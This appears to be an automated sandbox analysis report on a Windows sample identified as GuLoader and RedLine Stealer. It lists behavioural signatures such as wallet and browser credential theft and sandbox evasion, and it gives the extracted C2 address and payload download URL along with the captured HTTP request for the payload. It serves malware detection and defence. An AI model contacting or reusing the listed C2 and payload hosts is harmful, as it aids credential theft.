Windows Analysis Report mixfive_20211216-221155

Overview

General Information

Sample Name: mixfive_20211216-221155 (renamed file extension from none to exe)
Analysis ID: 541451
MD5: 66e3c71bcd364eb5cf19cb820683ef0c
SHA1: a51f002e800d652c14b2de10a63bbb80d276a33b
SHA256: ee23fa71bea1f05017e21b38e7592db6334a0fc4e9e44bb48452b40a4ddf0677
Tags: exe, GuLoader, RedlineStealer

Detection

GuLoader RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • mixfive_20211216-221155.exe (PID: 4728 cmdline: "C:\Users\user\Desktop\mixfive_20211216-221155.exe" MD5: 66E3C71BCD364EB5CF19CB820683EF0C)
    • mixfive_20211216-221155.exe (PID: 4240 cmdline: "C:\Users\user\Desktop\mixfive_20211216-221155.exe" MD5: 66E3C71BCD364EB5CF19CB820683EF0C)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["194.26.229.202:18758"], "Bot Id": "private_1"}

Threatname: GuLoader

{"Payload URL": "http://185.112.83.8/Allocation.bin"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Memory Dumps

Source | Rule | Description | Author
0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000000C.00000000.813287233.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Unpacked PEs

Source | Rule | Description | Author
12.2.mixfive_20211216-221155.exe.20590000.2.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
12.2.mixfive_20211216-221155.exe.20b60000.4.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
12.3.mixfive_20211216-221155.exe.a3fcd8.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
12.2.mixfive_20211216-221155.exe.20590000.2.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
12.2.mixfive_20211216-221155.exe.20b60000.4.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000C.00000000.813287233.0000000000560000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://185.112.83.8/Allocation.bin"}
Source: 12.2.mixfive_20211216-221155.exe.1e140f6e.0.raw.unpack Malware Configuration Extractor: RedLine {"C2 url": ["194.26.229.202:18758"], "Bot Id": "private_1"}
Source: mixfive_20211216-221155.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: mixfive_20211216-221155.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: _.pdb source: mixfive_20211216-221155.exe, 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_00406873 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe Code function: 0_2_0040290B FindFirstFileW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.4:49857 -> 185.112.83.8:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.112.83.8/Allocation.bin
Source: Joe Sandbox View ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
Source: Joe Sandbox View ASN Name: HEANETIE HEANETIE
Source: global traffic HTTP traffic detected: GET /Allocation.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 185.112.83.8 Cache-Control: no-cache
Source: global traffic TCP traffic: 192.168.2.4:49858 -> 194.26.229.202:18758
Source: unknown TCP traffic detected without corresponding DNS query: 185.112.83.8
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp String found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001528934.0000000000920000.00000004.00000001.sdmp String found in binary or memory: http://185.112.83.8/Allocation.bin
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001581740.00000000009D8000.00000004.00000020.sdmp String found in binary or memory: http://185.112.83.8/Allocation.binwq
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: mixfive_20211216-221155.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: mixfive_20211216-221155.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: mixfive_20211216-221155.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: mixfive_20211216-221155.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: mixfive_20211216-221155.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: mixfive_20211216-221155.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp String found in binary or memory: http://forms.rea
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp String found in binary or memory: http://go.micros
Source: mixfive_20211216-221155.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: mixfive_20211216-221155.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: mixfive_20211216-221155.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultl
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm4
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
